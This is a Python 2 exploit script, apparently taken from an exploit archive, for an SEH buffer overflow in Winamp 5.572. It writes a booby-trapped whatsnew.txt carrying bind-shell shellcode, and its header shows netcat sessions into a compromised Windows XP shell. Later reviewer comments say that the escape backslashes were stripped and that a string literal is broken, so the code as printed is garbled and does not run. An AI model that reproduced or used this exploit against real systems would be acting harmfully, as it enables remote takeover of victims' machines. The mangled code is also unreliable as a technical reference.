Winamp 5.572 Exploit - SEH

Date: 2010-01-26 — Author: TecR0c
#!/usr/bin/python
#
################################################################
# 
# Exploit Title: Winamp
#
################################################################
#
# tecr0c@backtrack:~/exploits/winamp$ nc -v 192.168.2.24 4444
# 192.168.2.24: inverse host lookup failed: Unknown server error : Connection timed out
# (UNKNOWN) [192.168.2.24] 4444 (?) open
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Program Files\Winamp>exit
# exit
# tecr0c@backtrack:~/exploits/winamp$ nc -v 192.168.2.24 4444
# 192.168.2.24: inverse host lookup failed: Unknown server error : Connection timed out
# (UNKNOWN) [192.168.2.24] 4444 (?) open
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Program Files\Winamp>exit
# exit
# tecr0c@backtrack:~/exploits/winamp$ nc -v 192.168.2.24 4444
# 192.168.2.24: inverse host lookup failed: Unknown server error : Connection timed out
# (UNKNOWN) [192.168.2.24] 4444 (?) open
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Program Files\Winamp> 

# Start-up banner (Python 2 `print` statement syntax, so this file will not
# run unchanged under Python 3).
# NOTE(review): backslashes in the ASCII art survive on only one line; the
# others appear to have been stripped by the page's formatting, as happens
# elsewhere in this listing.
print "|------------------------------------------------------------------|"
print "|                         __               __                      |"
print "|   _________  ________  / /___ _____     / /____  ____ _____ ___  |"
print "|  / ___/ __ / ___/ _ / / __ `/ __    / __/ _ / __ `/ __ `__  |"
print "| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |"
print "| \___/\____/_/   \___/_/\__,_/_/ /_/   \__/\___/\__,_/_/ /_/ /_/  |"
print "|								  |"
print "|-------------------------------------------------[ EIP Hunters ]--|"


# Payload stage appended to the file body below. It is only named `bind`
# here; the transcript in the header shows a listener answering on port
# 4444 after the file is opened, which is presumably what this stage does.
# NOTE(review): as printed, the `\x` escape backslashes appear to have been
# stripped, so each "xNN" pair is plain ASCII text rather than one byte and
# the literal's length is not what the author's `len()` arithmetic assumed.
bind = (
"x6ax50x59xd9xeexd9x74x24xf4x5bx81x73x13x9axec"
"x40xbdx83xebxfcxe2xf4x66x86xabxf0x72x15xbfx42"
"x65x8cxcbxd1xbexc8xcbxf8xa6x67x3cxb8xe2xedxaf"
"x36xd5xf4xcbxe2xbaxedxabxf4x11xd8xcbxbcx74xdd"
"x80x24x36x68x80xc9x9dx2dx8axb0x9bx2exabx49xa1"
"xb8x64x95xefx09xcbxe2xbexedxabxdbx11xe0x0bx36"
"xc5xf0x41x56x99xc0xcbx34xf6xc8x5cxdcx59xddx9b"
"xd9x11xafx70x36xdaxe0xcbxcdx86x41xcbxfdx92xb2"
"x28x33xd4xe2xacxedx65x3ax26xeexfcx84x73x8fxf2"
"x9bx33x8fxc5xb8xbfx6dxf2x27xadx41xa1xbcxbfx6b"
"xc5x65xa5xdbx1bx01x48xbfxcfx86x42x42x4ax84x99"
"xb4x6fx41x17x42x4cxbfx13xeexc9xbfx03xeexd9xbf"
"xbfx6dxfcx84x51xe1xfcxbfxc9x5cx0fx84xe4xa7xea"
"x2bx17x42x4cx86x50xecxcfx13x90xd5x3ex41x6ex54"
"xcdx13x96xeexcfx13x90xd5x7fxa5xc6xf4xcdx13x96"
"xedxcexb8x15x42x4ax7fx28x5axe3x2ax39xeax65x3a"
"x15x42x4ax8ax2axd9xfcx84x23xd0x13x09x2axedxc3"
"xc5x8cx34x7dx86x04x34x78xddx80x4ex30x12x02x90"
"x64xaex6cx2ex17x96x78x16x31x47x28xcfx64x5fx56"
"x42xefxa8xbfx6bxc1xbbx12xecxcbxbdx2axbcxcbxbd"
"x15xecx65x3cx28x10x43xe9x8exeex65x3ax2ax42x65"
"xdbxbfx6dx11xbbxbcx3ex5ex88xbfx6bxc8x13x90xd5"
"x6ax66x44xe2xc9x13x96x42x4axecx40xbd")

# Assemble the file body, padded to 6000 characters in total: a
# "Winamp 5.572" marker, a 672-character filler run, two 4-character values
# (presumably the SEH record overwrite the title refers to — inferred from
# the layout, not stated in the listing), a 30-character run, the payload
# stage, and trailing padding that fills whatever is left.
# NOTE(review): the same stripped-backslash garbling applies to every
# escape here, so `len(buff)` counts ASCII characters, not the intended
# bytes, and the final padding length differs from the author's intent.
# From a detection standpoint, a whatsnew.txt of exactly this size that
# starts with the product marker followed by a long single-character run
# is an easy file-content indicator.
buff = "Winamp 5.572"
buff += "x41" * 672
buff += "xebx06x90x90"
buff += "x46x59xb0x01"
buff += "x90" * 30
buff += bind
buff += "xcc" * (6000-len(buff))


# Write the buffer to whatsnew.txt in the current working directory; the
# header transcript's prompt suggests the file is then placed in Winamp's
# install directory, but the script itself does not do that.
# NOTE(review): `zip` shadows the builtin of the same name; the bare
# `except:` hides the real reason for any failure (permissions, disk full,
# even KeyboardInterrupt) behind a generic message; and the success
# message below is split across two lines by the page's formatting, which
# leaves an unterminated string literal — the file does not parse as
# printed. A `with open(...) as f:` block would also close the handle on
# the error path, which the explicit `close()` here does not.
try:
   zip = open("whatsnew.txt",'w')
   zip.write(buff)
   zip.close()
   print "[+] Vulnerable file created!
"
except:
   print "[-] Error occured!"
